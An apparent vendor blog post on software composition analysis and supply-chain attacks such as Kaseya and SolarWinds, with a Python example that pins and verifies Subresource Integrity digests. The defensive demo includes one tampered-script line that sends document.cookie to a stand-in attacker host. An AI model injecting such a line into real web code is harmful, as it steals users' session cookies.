Software Composition Analysis and Defense-in-Depth


As the number and sophistication of attacks continue to increase, many organisations are adopting a defence-in-depth approach to cyber security. That means taking a deeper dive into software composition analysis (SCA) to defend against supply-chain attacks.

For evidence of the rising importance of this issue, see our recent research, ‘The State of Application Security Report 2021’. The second most popular solution to deploy over the next 12 months is software supply-chain protection scanning, while another 30 per cent of respondents are looking to use software supply-chain protection as a standalone service. SCA is already the most popular defence against software supply-chain attacks, used by 59 per cent of US and Asia-Pacific organisations.

Software today is made up of dozens of different components – any one of which could contain its own vulnerabilities. So a typical website may include components for counting visitors, for running ecommerce, for hosting and displaying adverts or for personalising content. And many of these components are themselves made up of components from other vendors or open-source libraries. That means a multiplicity of potential vulnerabilities. It means that any software purchase effectively forces you to trust that dozens of unknown suppliers and developers have carried out proper due diligence.

And as our survey showed, this is not just a theoretical threat. Almost three-quarters of organisations surveyed (72 per cent) said their organisation had suffered at least one breach through a software vulnerability in the past year.

SCA is about checking the individual components that make up any application, or a new version of an application, for known vulnerabilities. But attackers are also going after well-known software providers to get into company supply chains.

The latest high-profile supply-chain attack used Kaseya – a popular IT management and security tool – to hide malware that infected hundreds of businesses around the world. Kaseya is used by many managed service providers who host corporate IT systems. The attack maximised damage by hitting over the Fourth of July holiday weekend in the US, when many businesses were closed. The criminals responsible for the malware, REvil group, demanded $70m in Bitcoin to decrypt business data. After being infected, it took Kaseya over a week to get its systems back up and running.

But the most damaging recent supply chain breach was the SolarWinds attack, which hit the headlines in December 2020 but is still claiming victims today. Cyber criminals inserted a back door into SolarWinds’ widely used network management software, which left thousands of its customers vulnerable. Organisations that were compromised included highly secure parts of the US government like the Department of Energy, Homeland Security and the State Department.

The good news is that although SCA is a new segment, there are free tools to help you secure your software. The Open Web Application Security Project (OWASP) provides a Dependency Checker tool that can scan your applications for known vulnerabilities and offer solutions; often components just need upgrading rather than replacing entirely.

Using this scanning tool should not be a one-off. It should be part of your regular software audit and run whenever new software is added or old applications updated. The checker regularly and automatically updates itself to check for new vulnerabilities.

This should form part of a defence-in-depth approach, because SCA is not a magic bullet. Still, when used together with Barracuda’s WAF v11 and WAF-as-a-Service, client-side protection helps bolster that defence-in-depth and reduce the risk of supply-chain attacks by identifying changes to code in the server response (subresource integrity, SRI) and injecting browser security policies (Content Security Policy, CSP) at runtime.
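To show what the SRI side of that client-side protection actually checks, here is an added example (not Barracuda’s code and not the WAF’s implementation) that computes the `integrity` value a third-party `<script>` tag should carry and verifies a fetched copy against it, applying the browser rule that only the strongest listed digest counts. The script body and the tampered copy are constructed sample input.

```python
"""Subresource Integrity (SRI) digest generation and verification."""
import base64
import hashlib
import re

# Algorithms SRI allows, listed weakest to strongest. When an integrity
# attribute lists several, a browser checks only the strongest one.
_SRI_ALGOS = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}
_STRENGTH = ["sha256", "sha384", "sha512"]


def sri_digest(body: bytes, algo: str = "sha384") -> str:
    """Return the value to place in integrity="..." for this resource body."""
    if algo not in _SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = _SRI_ALGOS[algo](body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def parse_integrity(attr: str) -> list:
    """Split an integrity attribute into (algo, base64) pairs; unknown tokens are ignored."""
    pairs = []
    for token in attr.split():
        m = re.fullmatch(r"(sha256|sha384|sha512)-([A-Za-z0-9+/=]+)(\?.*)?", token)
        if m:
            pairs.append((m.group(1), m.group(2)))
    return pairs


def integrity_matches(body: bytes, attr: str) -> bool:
    """True if the body matches one of the digests for the strongest listed algorithm.

    A browser would load a resource whose attribute has no usable digest without
    checking it; this build-time check deliberately treats that as a failure.
    """
    pairs = parse_integrity(attr)
    if not pairs:
        return False
    strongest = max(pairs, key=lambda p: _STRENGTH.index(p[0]))[0]
    expected = {b64 for algo, b64 in pairs if algo == strongest}
    actual = sri_digest(body, strongest).split("-", 1)[1]
    return actual in expected


if __name__ == "__main__":
    # Constructed sample: a vendored analytics script and a modified copy.
    original = b"window.track = function (e) { send('/collect', e); };\n"
    tampered = original + b"send('//example.invalid/steal', document.cookie);\n"
    pinned = sri_digest(original)
    print(f'<script src="vendor/track.js" integrity="{pinned}" crossorigin="anonymous">')
    print("original matches:", integrity_matches(original, pinned))
    print("tampered matches:", integrity_matches(tampered, pinned))
```

Pinning the digest at build time means a changed server response for that component fails the browser check instead of executing, which is exactly the class of change the text describes detecting.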

To find out more about real-world threats and how organisations around the world are countering them, download our State of Application Security Report. It includes insights from over 750 security decision makers from around the world.
